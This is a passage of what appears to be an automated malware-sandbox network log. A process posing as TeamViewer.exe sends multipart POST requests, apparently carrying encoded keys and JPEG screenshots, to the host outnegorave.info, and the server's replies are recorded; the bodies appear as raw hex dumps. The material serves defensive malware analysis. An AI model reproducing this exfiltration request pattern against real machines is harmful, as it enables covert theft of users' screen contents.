                                                                                                                                    2021-09-15 11:52:33 UTC2279OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 62 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^b;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:33 UTC2279OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:33 UTC2295OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:33 UTC2311OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:33 UTC2327OUTData Raw: 31 0b 4b 49 45 31 01 a5 14 94 a2 80 14 52 52 8a 43 4c 41 4b 49 40 a4 03 85 38 53 69 6a 90 98 b4 52 52 d3 01 68 a2 8a 09 16 8a 28 a6 01 45 14 50 21 c2 96 9a 29 45 34 02 d2 d2 52 d3 24 29 69 29 45 30 16 8a 28 a6 21 68 a4 a5 a0 41 4b 49 4b 4d 00 ea 29 05 2d 32 42 94 51 45 30 16 8a 05 2d 31 09 49 4b 45 00 20 eb 4f a6 0e b4 fa 10 30 a0 d1 45 32 40 52 d2 0a 76 28 40 c5 02 9d 4d a7 0a a4 4b 13 bd 2d 21 eb 4e 14 c0 41 4e a6 d2 8a 62 62 d1 45 14 08 05 2d 20 a7 53 10 94 ea 4a 29 83 1d 4b 4d 14 b4 c9 1d 9a 51 4d a5 14 d0 98 e1 4b 4d a7 0a 64 b0 a5 a4 a2 98 85 a2 92 96 80 0a 5a 4a 5a 00 5a 5a 6d 3a 81 30 a5 14 94 b4 08 5a 29 29 68 10 52 d1 45 30 0a 51 45 28 a0 4c 5a 05 25 28 a0 46 86 92 3f 7e e7 d1 0d 56 3d 4f d6 ad 69 3f eb a4 ff 00 74 d5 53 d4 fd 6b 25 f1 b0 9f c2
                                                                                                                                    Data Ascii: 1KIE1RRCLAKI@8SijRRh(EP!)E4R$)i)E0(!hAKIKM)-2BQE0-1IKE O0E2@Rv(@MK-!NANbbE- SJ)KMQMKMdZJZZZm:0Z))hRE0QE(LZ%(F?~V=Oi?tSk%
                                                                                                                                    2021-09-15 11:52:33 UTC2343OUTData Raw: 69 88 28 a4 a5 a6 02 d2 d3 69 68 10 e1 45 25 2d 50 85 14 b4 dc d2 d3 10 ec d2 d3 69 68 10 e1 4a 29 b4 a0 d5 26 4b 24 14 52 03 45 52 24 5a 5a 4a 33 4c 2c 2e 68 cd 20 a5 a2 e2 b0 a2 97 34 ca 5c d3 b8 58 7e 69 69 99 a5 cd 32 6c 38 52 e6 9b 9a 29 dc 2c 3f 34 66 9b 9a 37 7b 51 71 58 90 1a 5c d4 7b 8f ad 19 f7 a7 71 58 93 22 8c d4 79 a5 cd 17 15 87 e6 8c d3 73 46 69 dc 2c 3a 97 34 da 33 45 c5 61 d9 a5 cd 33 34 66 9d c2 c3 f3 46 69 9b a9 37 51 70 e5 24 cd 19 a8 f7 51 ba 95 c3 94 93 75 26 ea 88 bd 34 bd 0e 43 50 26 2d 4d 2f 51 17 a6 96 a9 73 29 40 94 bd 30 bd 46 5a 98 5a a1 c8 b5 02 42 fe f4 c2 d4 c2 d4 c2 d5 0e 46 8a 23 cb 53 0b 53 4b 53 0b 56 6e 46 8a 23 89 a6 13 48 4d 25 43 65 a4 29 34 94 94 66 93 1d 84 34 50 69 b5 25 20 cd 14 94 94 ae 3b 14 31 de 96 92 8a e5
                                                                                                                                    Data Ascii: i(ihE%-PihJ)&K$RER$ZZJ3L,.h 4\X~ii2l8R),?4f7{QqX\{qX"ysFi,:43Ea34fFi7Qp$Qu&4CP&-M/Qs)@0FZZBF#SSKSVnF#HM%Ce)4f4Pi% ;1
                                                                                                                                    2021-09-15 11:52:33 UTC2359OUTData Raw: fc ab 9e d7 fe 1a ea 16 7b a6 d2 24 fb 6c 23 9f 2d b0 b2 8f e8 df a7 d2 99 e2 0f 87 1a 8d 86 e9 b4 a6 37 d0 0e 76 01 89 54 7d 3f 8b f0 e7 da ba 0f 08 f8 1b 43 36 b1 df 5c cb fd a3 21 ea 8c bb 52 36 ee a5 3a e4 77 0d f9 52 03 ca e6 8a 48 25 68 a7 8d e3 91 0e 19 1d 48 20 fb 83 4c ae 8f e2 12 24 7e 35 bf 48 d5 51 14 44 02 a8 c0 03 ca 4a e7 2a 84 15 6f 4d b2 6b eb a1 18 3b 50 72 ed e8 2a a5 74 1e 17 db 8b 90 7a fc bf 97 35 32 76 5a 11 52 a2 a6 b9 da bd 8d cb 3d 1a dc 26 cb 6b 31 26 d1 c9 29 b8 fe 35 5f 50 f0 e0 b8 56 11 da b4 33 0e 85 50 8f cc 56 e8 df fd 9b 6e 22 c9 8c 67 7e 3f bf 9e ff 00 86 2b 6f 4d f3 7e c2 9e 7e 77 64 ed dd d7 6f 6f eb 58 62 69 4a 86 1d 62 14 b5 ec 7a 30 c7 53 ad 3f 65 18 7b a7 8b 4d 13 c1 33 c5 2a 95 74 25 58 1e c6 99 5b 5e 31 f2 ff 00
                                                                                                                                    Data Ascii: {$l#-7vT}?C6\!R6:wRH%hH L$~5HQDJ*oMk;Pr*tz52vZR=&k1&)5_PV3PVn"g~?+oM~~wdooXbiJbz0S?e{M3*t%X[^1
                                                                                                                                    2021-09-15 11:52:33 UTC2362OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 35 35 36 38 39 39 35 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------285568995--
                                                                                                                                    2021-09-15 11:52:34 UTC2362INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:34 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=27078f6c1fc9217215d5162b9b43baa26cbe36370b513145cdaee5004466a227; expires=Thu, 15-Sep-2022 11:52:33 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F3riMOK7e0DL1cbix8NcjFixr5%2Fbnyf76TWAfjoMlB90rSe%2BQyzhi3H%2Fdu5uy0aCUetZOF8xmfZ0tDxL8LejMmUuQoe9SUOunRhuWf55SJGtM9tV8E0kT4h4iOlz5n%2FSjdV%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a64b1faac281-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:34 UTC2363INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    28192.168.2.549819172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:37 UTC2363OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 88438
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2471988
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:37 UTC2363OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 34 37 31 39 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2471988Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:37 UTC2363OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 f3 06 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:37 UTC2363OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:37 UTC2379OUTData Raw: 73 fa d7 29 e5 af a5 27 96 be 94 bd 93 ee 57 b4 5f d7 ad ce b7 ec 3a 84 ba af f6 b4 56 f7 57 56 96 de 43 da 25 b4 6c e6 60 17 f7 65 b1 9c 70 b8 63 eb 90 3d b3 64 b5 b7 1a 53 6a 93 42 14 ec 6b 77 88 b3 03 f6 ac f5 c7 51 f2 fc d8 e9 91 8c 56 2f 96 33 9c 51 b0 67 34 fd 9b ee 4f 3a 1d da 8a 28 ad 8c 82 8a 28 a0 02 8a 29 68 01 28 a5 a4 a0 05 14 b4 51 4c 41 45 14 50 31 3b d2 d1 45 02 0a 5a 4a 28 01 68 a4 a5 a0 02 8a 28 a6 21 68 14 94 b4 00 b9 a3 34 94 b4 00 52 e6 92 8a 62 1d 9a 51 4d 14 b4 c5 61 d4 60 53 73 4b 4e e2 b0 6d a4 2b 4e 06 97 34 59 05 c8 f6 d6 af 86 d7 1a a7 fc 00 d6 77 15 ab e1 d1 ff 00 13 31 fe e1 a9 94 74 2a 32 d4 ea 31 54 d2 ee e1 d0 32 da 12 18 64 7c c7 fc 2a fe 2b 39 44 90 c2 8b 24 2c 08 50 3e f2 f3 8f c6 b2 8a 5d 4d 26 df 40 92 fa 68 97 32 5b
                                                                                                                                    Data Ascii: s)'W_:VWVC%l`epc=dSjBkwQV/3Qg4O:(()h(QLAEP1;EZJ(h(!h4RbQMa`SsKNm+N4Yw1t*21T2d|*+9D$,P>]M&@h2[
                                                                                                                                    2021-09-15 11:52:37 UTC2395OUTData Raw: 92 2c 65 fb 74 7b 15 d5 7c 8b c2 91 b2 b3 16 c3 c7 b4 86 c1 27 b8 c8 ac a1 57 4d c9 af 78 9a 8a 37 f7 45 a2 8a 2b 43 32 d4 96 f1 a6 8d 0d e0 2f e6 3d cc 90 91 db 0a aa 47 e3 f3 1a d4 8b c3 77 53 6a 3a 72 43 65 7f 25 95 ca 40 f2 4e b1 12 17 78 05 b0 c0 60 01 93 d7 a7 7a ce 8a f2 d7 fb 2c 58 dd d9 cf 2e c9 9e 64 92 2b 80 98 2c aa 30 41 46 cf dd f5 14 7f 69 13 ab 58 ea 06 df 9b 35 80 79 7b fe ff 00 96 00 eb 8e 33 8f c2 b2 6e 57 fe bb 1a 5a 36 f9 7e a5 bb ad 36 2b 7d 0e 1b d4 b1 d4 26 f3 03 96 b8 56 1e 4c 44 48 c8 01 1b 0f 60 3f 88 75 ab 57 5a 25 a4 b7 93 5a e9 e6 e6 27 b7 be 5b 46 7b 87 0e af b8 13 b8 61 46 08 da 49 1c f0 6b 2a e2 f6 da ef 4f 82 19 ec ae 05 c5 ba ba c7 22 5c 00 9f 33 b3 f2 a5 09 3f 7b 1d 45 49 7b ad df de 6b 2b a9 3c b2 fe ea 6f 36 08 65 90
                                                                                                                                    Data Ascii: ,et{|'WMx7E+C2/=GwSj:rCe%@Nx`z,X.d+,0AFiX5y{3nWZ6~6+}&VLDH`?uWZ%Z'[F{aFIk*O"\3?{EI{k+<o6e
                                                                                                                                    2021-09-15 11:52:37 UTC2411OUTData Raw: a5 a4 14 ec 50 26 25 14 a4 52 53 01 69 45 20 a7 53 13 14 52 81 49 4e 51 cd 34 4b 1e 38 14 66 8a 4a b2 42 9c 29 31 4e 14 d0 98 b4 b4 94 b4 c9 14 52 d2 73 4a 2a 90 98 b4 51 45 32 42 94 75 a4 a5 14 00 ea 29 29 68 10 b4 52 52 53 01 73 4a 29 05 2d 02 62 d1 49 4b 4c 42 d2 d2 52 d0 21 68 a2 8a 04 2d 14 52 d0 01 45 14 0a 04 14 a2 8a 51 40 98 b4 51 45 31 05 14 51 40 1a 3a 1f 17 c4 ff 00 b0 6a bc 9f eb 1b eb 53 e8 e7 17 67 fd c3 55 db ef b7 d4 d6 49 7e f1 8e 6f dc 41 45 25 28 ad 4c 45 a2 90 52 d2 10 b4 0a 28 a4 21 68 a2 8a 04 14 51 45 20 0a 5a 4a 5a 00 28 a2 8a 00 28 a2 96 80 01 4e 41 96 03 d4 d2 54 b6 eb ba 65 1e f5 12 7a 0e 0a f2 48 b5 e2 d5 c5 95 90 f4 5a e5 ed 87 fa 54 5f ef 8f e7 5d 77 8c 17 16 96 9e cb 5c 9d b0 ff 00 4b 8b fd f1 fc eb 9e 87 f0 7e f3 d7 a9 a5
                                                                                                                                    Data Ascii: P&%RSiE SRINQ4K8fJB)1NRsJ*QE2Bu))hRRSsJ)-bIKLBR!h-REQ@QE1Q@:jSgUI~oAE%(LER(!hQE ZJZ((NATezHZT_]w\K~
                                                                                                                                    2021-09-15 11:52:37 UTC2427OUTData Raw: 28 b8 0b 45 25 2d 00 2d 14 94 b4 c4 14 b4 94 50 03 a8 a4 a5 a6 21 68 a4 a2 80 16 8a 28 a0 41 45 14 50 01 45 14 50 02 d1 49 4b 4c 05 a2 8a 29 88 51 4b 48 29 69 89 8b 45 25 2d 31 0b 45 25 2d 02 16 94 1a 6d 2d 30 1d 45 26 69 69 88 5a 29 28 a0 56 17 34 66 9b 45 01 61 d9 a5 cd 36 8a 77 0b 0e cd 2e 69 b9 a2 9d c5 61 d9 a5 cd 32 8a 2e 16 1f 9a 33 4d a2 8b 8a c3 b3 4b 9a 66 68 0d 4e e1 61 f9 a5 a8 f7 51 ba 8b 85 89 73 49 9a 8f 26 8c 9a 39 82 c4 9b a8 dc 2a 3a 28 e6 15 89 37 52 6e a6 d2 d1 71 d8 76 e3 46 73 48 28 a7 71 0b 45 25 14 00 b4 52 51 40 0e a2 92 8a 04 3a 96 9b 4b 4c 42 e6 9d 4c a5 a6 84 d0 ec d0 29 29 45 3b 88 5c d2 d3 69 69 8a c2 d3 a9 a2 96 98 98 b4 b4 94 b4 d0 87 52 83 4d 14 b5 48 96 3a 9c 29 94 f1 54 84 c5 14 b4 94 b4 c9 16 96 9b 4b 4c 4c 75 14 94 53
                                                                                                                                    Data Ascii: (E%--P!h(AEPEPIKL)QKH)iE%-1E%-m-0E&iiZ)(V4fEa6w.ia2.3MKfhNaQsI&9*:(7RnqvFsH(qE%RQ@:KLBL))E;\iiRMH:)TKLLuS
                                                                                                                                    2021-09-15 11:52:37 UTC2443OUTData Raw: 3c 91 5f c4 70 b6 ef b4 6e 12 76 c7 ca bd c1 1e fd 2a bc 70 cc 2f 2d b5 83 1b 7f 67 c7 a4 ed 37 1f c1 b8 40 63 db 9e 9b b7 f1 8e b5 c8 ec 14 6d 14 95 37 6b 7f 5b 58 39 d5 c5 5f ba 29 69 28 ad 4c c5 a2 8a 28 00 a2 8a 28 00 a5 a4 a2 80 16 8a 28 a6 01 45 14 94 00 b4 52 51 40 85 a5 a4 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a0 02 8a 28 a6 01 9a 5a 4a 28 10 b4 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 b4 94 53 01 73 45 25 14 08 5a 5a 4a 28 01 69 69 28 a0 02 96 92 8a 62 16 8a 4a 28 01 68 a2 8a 00 05 2d 25 19 a6 02 d1 49 45 01 61 68 a2 8a 04 2d 14 94 50 02 d2 51 45 00 14 51 45 00 14 51 45 00 14 66 92 8a 43 0a 29 28 a0 05 a2 92 8a 00 5a 4a 28 a0 02 8a 28 a0 61 45 25 19 a4 02 d2 d2 66 93 34 5c 2c 2d 14 99 a2 8b 85 85 a2 9b 46 68 0b 0b 45 25 25
                                                                                                                                    Data Ascii: <_pnv*p/-g7@cm7k[X9_)i(L(((ERQ@(ZJ(h(ZJ(QEQEQEQEQESsE%ZZJ(ii(bJ(h-%IEah-PQEQEQEfC)(ZJ((aE%f4\,-FhE%%
                                                                                                                                    2021-09-15 11:52:37 UTC2449OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 34 37 31 39 38 38 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2471988--
                                                                                                                                    2021-09-15 11:52:38 UTC2449INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:38 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=1d417931ae1d52e75ae61eaa4a3657311fef6c7779eccd2115b101c6618b6548; expires=Thu, 15-Sep-2022 11:52:37 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XxRdhsvKCjcMfe9fyq4F21csb2rtKhaZtj0qcJ5OzLcg5%2Bpga4cARjbIvbovNmHTXk0dd5dfoWISmKqESYLJexKsau4YvwAsoAPP%2BPnMNZDHsPTpPTCXTju%2F%2FPIEAsY72j5F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6639c9f4a6d-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:38 UTC2450INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    29192.168.2.549820172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:38 UTC2450OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85028
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1216366252
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:38 UTC2450OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 31 36 33 36 36 32 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1216366252Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:38 UTC2451OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 9b 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:38 UTC2451OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
